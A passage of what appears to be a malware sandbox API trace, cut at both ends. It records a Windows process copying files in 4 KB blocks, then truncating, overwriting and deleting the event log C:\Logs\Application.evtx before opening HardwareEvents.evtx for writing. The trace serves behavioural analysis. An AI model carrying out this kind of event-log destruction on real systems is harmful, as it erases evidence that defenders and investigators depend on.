GetLastError () returned 0x0 [0084.893] SetLastError (dwErrCode=0x0) [0084.902] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.903] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.903] GetLastError () returned 0x0 [0084.903] SetLastError (dwErrCode=0x0) [0084.903] GetLastError () returned 0x0 [0084.903] SetLastError (dwErrCode=0x0) [0084.903] GetLastError () returned 0x0 [0084.903] SetLastError (dwErrCode=0x0) [0084.903] GetLastError () returned 0x0 [0084.903] SetLastError (dwErrCode=0x0) [0084.903] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.904] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.904] GetLastError () returned 0x0 [0084.904] SetLastError (dwErrCode=0x0) [0084.904] GetLastError () returned 0x0 [0084.904] SetLastError (dwErrCode=0x0) [0084.904] GetLastError () returned 0x0 [0084.904] SetLastError (dwErrCode=0x0) [0084.904] GetLastError () returned 0x0 [0084.904] SetLastError (dwErrCode=0x0) [0084.904] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.904] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.905] GetLastError () returned 0x0 [0084.905] SetLastError (dwErrCode=0x0) [0084.905] GetLastError () returned 0x0 [0084.905] SetLastError (dwErrCode=0x0) [0084.905] GetLastError () returned 0x0 [0084.905] SetLastError (dwErrCode=0x0) [0084.905] GetLastError () returned 0x0 [0084.905] SetLastError (dwErrCode=0x0) [0084.905] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.905] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.906] GetLastError () returned 0x0 [0084.906] SetLastError (dwErrCode=0x0) [0084.906] GetLastError () returned 0x0 [0084.906] SetLastError (dwErrCode=0x0) [0084.906] GetLastError () returned 0x0 [0084.906] SetLastError (dwErrCode=0x0) [0084.906] GetLastError () returned 0x0 [0084.906] SetLastError (dwErrCode=0x0) [0084.906] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.906] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.907] GetLastError () returned 0x0 [0084.907] SetLastError (dwErrCode=0x0) [0084.907] GetLastError () returned 0x0 [0084.907] SetLastError (dwErrCode=0x0) [0084.907] GetLastError () returned 0x0 [0084.907] SetLastError (dwErrCode=0x0) [0084.907] GetLastError () returned 0x0 [0084.907] SetLastError (dwErrCode=0x0) [0084.907] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.907] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.907] GetLastError () returned 0x0 [0084.907] SetLastError (dwErrCode=0x0) [0084.908] GetLastError () returned 0x0 [0084.908] SetLastError (dwErrCode=0x0) [0084.908] GetLastError () returned 0x0 [0084.908] SetLastError (dwErrCode=0x0) [0084.908] GetLastError () returned 0x0 [0084.908] SetLastError (dwErrCode=0x0) [0084.908] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.908] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.908] GetLastError () returned 0x0 [0084.908] SetLastError (dwErrCode=0x0) [0084.908] GetLastError () returned 0x0 [0084.908] SetLastError (dwErrCode=0x0) [0084.909] GetLastError () returned 0x0 [0084.909] SetLastError (dwErrCode=0x0) [0084.909] GetLastError () returned 0x0 [0084.909] SetLastError (dwErrCode=0x0) [0084.909] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.909] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.909] GetLastError () returned 0x0 [0084.909] SetLastError (dwErrCode=0x0) [0084.909] GetLastError () returned 0x0 [0084.909] SetLastError (dwErrCode=0x0) [0084.909] GetLastError () returned 0x0 [0084.909] SetLastError (dwErrCode=0x0) [0084.910] GetLastError () returned 0x0 [0084.910] SetLastError (dwErrCode=0x0) [0084.910] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.910] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.910] GetLastError () returned 0x0 [0084.910] SetLastError (dwErrCode=0x0) [0084.910] GetLastError () returned 0x0 [0084.910] SetLastError (dwErrCode=0x0) [0084.910] GetLastError () returned 0x0 [0084.910] SetLastError (dwErrCode=0x0) [0084.910] GetLastError () returned 0x0 [0084.911] SetLastError (dwErrCode=0x0) [0084.911] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.911] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.911] GetLastError () returned 0x0 [0084.911] SetLastError (dwErrCode=0x0) [0084.911] GetLastError () returned 0x0 [0084.911] SetLastError (dwErrCode=0x0) [0084.911] GetLastError () returned 0x0 [0084.911] SetLastError (dwErrCode=0x0) [0084.911] GetLastError () returned 0x0 [0084.911] SetLastError (dwErrCode=0x0) [0084.912] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.912] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.912] GetLastError () returned 0x0 [0084.912] SetLastError (dwErrCode=0x0) [0084.912] GetLastError () returned 0x0 [0084.912] SetLastError (dwErrCode=0x0) [0084.912] GetLastError () returned 0x0 [0084.912] SetLastError (dwErrCode=0x0) [0084.912] GetLastError () returned 0x0 [0084.912] SetLastError (dwErrCode=0x0) [0084.912] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.913] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.913] GetLastError () returned 0x0 [0084.913] SetLastError (dwErrCode=0x0) [0084.913] GetLastError () returned 0x0 [0084.913] SetLastError (dwErrCode=0x0) [0084.913] GetLastError () returned 0x0 [0084.913] SetLastError (dwErrCode=0x0) [0084.913] GetLastError () returned 0x0 [0084.913] SetLastError (dwErrCode=0x0) [0084.913] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.913] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.914] GetLastError () returned 0x0 [0084.914] SetLastError (dwErrCode=0x0) [0084.914] GetLastError () returned 0x0 [0084.914] SetLastError (dwErrCode=0x0) [0084.914] GetLastError () returned 0x0 [0084.914] SetLastError (dwErrCode=0x0) [0084.914] GetLastError () returned 0x0 [0084.914] SetLastError (dwErrCode=0x0) [0084.914] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.914] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.915] GetLastError () returned 0x0 [0084.915] SetLastError (dwErrCode=0x0) [0084.915] GetLastError () returned 0x0 [0084.915] SetLastError (dwErrCode=0x0) [0084.915] GetLastError () returned 0x0 [0084.915] SetLastError (dwErrCode=0x0) [0084.915] GetLastError () returned 0x0 [0084.915] SetLastError (dwErrCode=0x0) [0084.915] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.915] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.915] GetLastError () returned 0x0 [0084.915] SetLastError (dwErrCode=0x0) [0084.916] GetLastError () returned 0x0 [0084.916] SetLastError (dwErrCode=0x0) [0084.916] GetLastError () returned 0x0 [0084.916] SetLastError (dwErrCode=0x0) [0084.916] GetLastError () returned 0x0 [0084.916] SetLastError (dwErrCode=0x0) [0084.916] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0084.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0084.916] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0084.916] GetLastError () returned 0x0 [0084.916] SetLastError (dwErrCode=0x0) [0084.917] GetLastError () returned 0x0 [0084.917] SetLastError (dwErrCode=0x0) [0084.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0084.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0084.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0084.917] CloseHandle (hObject=0x424) returned 1 [0084.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0084.919] CloseHandle (hObject=0x354) returned 1 [0084.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.919] AreFileApisANSI () returned 1 [0084.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0084.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78950 [0084.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78950, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0084.920] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.921] GetFileType (hFile=0x354) returned 0x1 [0084.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78950 | out: hHeap=0x20000) returned 1 [0084.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0084.921] GetLastError () returned 0xb7 [0084.921] SetLastError (dwErrCode=0xb7) [0084.921] WriteFile (in: hFile=0x354, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0084.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0084.922] CloseHandle (hObject=0x354) returned 1 [0084.923] AreFileApisANSI () returned 1 [0084.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0084.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78950 [0084.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78950, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0084.923] DeleteFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78950 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.924] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x0, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0084.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0084.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0084.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0084.925] AreFileApisANSI () returned 1 [0084.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\HardwareEvents.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\HardwareEvents.evtx", lpUsedDefaultChar=0x0) returned 28 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.926] AreFileApisANSI () returned 1 [0084.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0084.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78e50 [0084.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78e50, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0084.926] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.926] GetFileType (hFile=0x354) returned 0x1 [0084.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78e50 | out: hHeap=0x20000) returned 1 [0084.926] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.926] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.926] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.927] CloseHandle (hObject=0x354) returned 1 [0084.927] AreFileApisANSI () returned 1 [0084.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78c50 [0084.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78c50, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0084.927] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.927] GetFileType (hFile=0x354) returned 0x1 [0084.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78c50 | out: hHeap=0x20000) returned 1 [0084.927] CloseHandle (hObject=0x354) returned 1 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, 